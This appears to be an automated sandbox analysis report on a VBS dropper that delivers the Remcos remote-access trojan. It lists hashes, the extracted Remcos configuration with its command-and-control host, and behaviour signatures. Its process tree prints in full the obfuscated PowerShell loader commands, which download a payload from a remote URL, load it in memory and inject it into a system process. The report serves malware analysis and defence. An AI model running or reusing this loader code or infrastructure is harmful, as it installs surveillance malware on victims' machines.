Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
26-09-2024 08:57
General
-
Target
asegurar.vbs
-
Size
501KB
-
MD5
68f1d5edc9ea0eed35df8223763daee8
-
SHA1
70cace5a37a31722c7e860ce9dd9fad8ea326be1
-
SHA256
dc8376cec72b52f0a7e6ef863740991cad8e2c99d769460e73f0593c4405fce8
-
SHA512
e15043efa9e29c7f16aa7d99377df0e33c593275ac8b5783bf2e09b6171ff3c46b0e06a12789e5fc5774bbbc3a5a62885034784a56168cdb599184f1c0e7cb8a
-
SSDEEP
12288:rPQSbkVemyiwLDY+QwRiGZzASD0EwcLJfbxdghlqtRLaTfhP8lV42Po/DtmUF5Lh:yoXuC9ZOGzM5HB
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Extracted
remcos
Tost
23spt.duckdns.org:3000
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-RZH5WZ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD53a3fb444a55da98ca287a33b6a56c344
SHA13bcabad7ba7798552ed458b2cb48310bb5cd25f2
SHA2566be54d977d9fc41e2895252af50cf390359f29f94c8df61d9752926df278e205
SHA51285f2787d06d171db704f46799237bd55f5a3d85ef4f5e901993e31faa28d7a8805dd548b0ceeb8508ed5873498cd3cc6ca2a15dda926061e280178338b0832c8
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
2.0MB